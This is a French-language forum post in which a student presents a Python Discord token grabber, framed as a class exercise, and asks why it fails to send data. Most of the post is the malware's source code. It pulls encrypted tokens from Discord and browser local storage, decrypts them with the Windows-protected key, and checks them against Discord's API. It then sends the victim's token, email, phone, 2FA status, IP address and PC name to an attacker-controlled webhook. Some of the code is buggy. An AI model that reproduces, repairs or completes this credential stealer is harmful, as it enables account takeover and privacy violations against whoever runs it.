Exercice cybersécurité
m1cr0-d0t
Je me présente, je suis en 1ere année d'étude de cybersécurité et nous avons comme travail a réaliser un token grabber sur la platforme que nous voulons (instagram, discord, etc...) codé en pyhton.
from base64 import b64decode
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData
from os import getlogin, listdir
from json import loads
from re import findall
from urllib.request import Request, urlopen
from subprocess import Popen, PIPE
import requests, json, os
from datetime import datetime
import json
from urllib import request as r
from urllib.error import HTTPError
from time import sleep as s
tokens = []
cleaned = []
checker = []
WEBHOOK_URL = ''
header = {
'Content-Type': 'application/json',
'user-agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/126.0.0.0'
}
def decrypt(buff, master_key):
try:
return AES.new(CryptUnprotectData(master_key, None, None, None, 0)[1], AES.MODE_GCM, buff[3:15]).decrypt(
buff[15:])[:-16].decode()
except:
return "Error"
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
print("ip find\n")
print(ip)
s(3)
except:
pass
return ip
def getToken():
print("w")
already_check = []
checker = []
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
print("wokkkkk")
chrome = local + "\\Google\\Chrome\\User Data\\Default"
paths = {
'Discord': roaming + '\\discord',
'Discord Canary': roaming + '\\discordcanary',
'Lightcord': roaming + '\\Lightcord',
'Discord PTB': roaming + '\\discordptb',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Opera GX': roaming + '\\Opera Software\\Opera GX Stable',
'Amigo': local + '\\Amigo\\User Data',
'Torch': local + '\\Torch\\User Data',
'Kometa': local + '\\Kometa\\User Data',
'Orbitum': local + '\\Orbitum\\User Data',
'CentBrowser': local + '\\CentBrowser\\User Data',
'7Star': local + '\\7Star\\7Star\\User Data',
'Sputnik': local + '\\Sputnik\\Sputnik\\User Data',
'Vivaldi': local + '\\Vivaldi\\User Data\\Default',
'Chrome SxS': local + '\\Google\\Chrome SxS\\User Data',
'Chrome': chrome + 'Default',
'Epic Privacy Browser': local + '\\Epic Privacy Browser\\User Data',
'Microsoft Edge': local + '\\Microsoft\\Edge\\User Data\\Defaul',
'Uran': local + '\\uCozMedia\\Uran\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Iridium': local + '\\Iridium\\User Data\\Default'
}
for platform, path in paths.items():
if not os.path.exists(path): continue
try:
with open(path + f"\\Local State", 'r') as file:
key = loads(file.read())['os_crypt']['encrypted_key']
file.close()
except:
continue
print("ww")
for file in listdir(path + f"\\Local Storage\\leveldb"):
if not file.endswith(".ldb") and file.endswith(".log"):
continue
else:
try:
with open(path + f"\\Local Storage\\leveldb\\{file}", "r", errors='ignore') as files:
for x in files.readline():
x.strip()
for values in findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", x):
tokens.append(values)
except PermissionError:
continue
for i in tokens:
if i.endswith("\\"):
i.replace("\\", "")
elif i not in cleaned:
cleaned.append(i)
for token in cleaned:
try:
tok = decrypt(b64decode(token.split('dQw4w9WgXcQ')[1]), b64decode(key)[5:])
except IndexError == "Error":
continue
checker.append(tok)
for value in checker:
if value not in already_check:
already_check.append(value)
headers = {'Autorization': tok, 'Content-Type': 'application/json'}
try:
res = requests.get('https://discordapp.com/api/v10/users/@me', headers=headers)
except:
continue
if res.status_code == 200:
print("wor")
res_json = res.json()
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_name = f'{res_json["username"]}#{res_json["discriminator"]}'
user_id = res_json['id']
email = res_json['email']
phone = res_json['phone']
mfa_enabled = res_json['mfa_enabled']
has_nitro = False
res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headers)
nitro_data = res.json()
has_nitro = bool(len(nitro_data) > 0)
days_left = 0
if has_nitro:
d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0],
"%Y-%m-%dT%H:%M:%S")
d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0],
"%Y-%m-%dT%H:%M:%S")
days_left = abs((d2 - d1).days)
embed = f"""**{user_name}** *({user_id})*\n
> :dividers: __Account Information__\n\tEmail: `{email}`\n\tPhone: `{phone}`\n\t2FA/MFA Enabled: `{mfa_enabled}`\n\tNitro: `{has_nitro}`\n\tExpires in: `{days_left if days_left else "None"} day(s)`\n
> :computer: __PC Information__\n\tIP: `{ip}`\n\tUsername: `{pc_username}`\n\tPC Name: `{pc_name}`\n\tPlatform: `{platform}`\n
> :piñata: __Token__\n\t`{tok}`\n
Made by Astraa#6100* **|** ||https://github.com/astraadev||"""
payload = json.dumps({'content': embed, 'username': 'Token Grabber - Made by Astraa',
'avatar_url': 'https://cdn.discordapp.com/attachments/826581697436581919/982374264604864572/atio.jpg'})
try:
headers2 = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Firefox/126.0.0.0 Safari/537.11'
}
print("working")
req = Request(WEBHOOK_URL, data=payload.encode(), headers=header, method='POST')
try:
re = urlopen(req)
print(re.status)
print(re.status)
print(re.status)
except HTTPError as e:
print('ERROR')
print(e.reason)
print(e.hdrs)
print(e.file.read())
except:
continue
else:
continue
getToken()
Explication du fonctionnement
Pour ma part j'ai choisi de réaliser le token grabber sur discord, le fonctionnement est simple quand on lance le code (en python) sur notre pc, cela doit renvoyer sur un fichier texte ou sur un serveur discord (via les webhook) un message avec les informations récupérées en local, sur le pc, grâce au token.
Problème rencontré
Le code est créé, il se lance sans erreurs mais aucunes informations n'est prélevée donc je ne reçoit rien sur mon serveur discord prévu a cet efffet.
Je pense que discord bloque ma requette HTTP get pour récupérer le token mais je n'arrive pas a savoir si il a juste un probleme dans mon code ou si discord a patché le fait de pouvoir grab le token avec une requette.
Si quelqu'un a des idées de comment y arriver je suis preneur.
PS: a noter que la variable WEBHOOK_URL est vide ici pour pas que quelqu'un ai l'accés a mon serveur, sinon il a bien le bon lien pour mon serveur.
Merci d'avance pour l'aide et le temps passer a regarder ce post.
Bonne journée.
m1cr0-d0t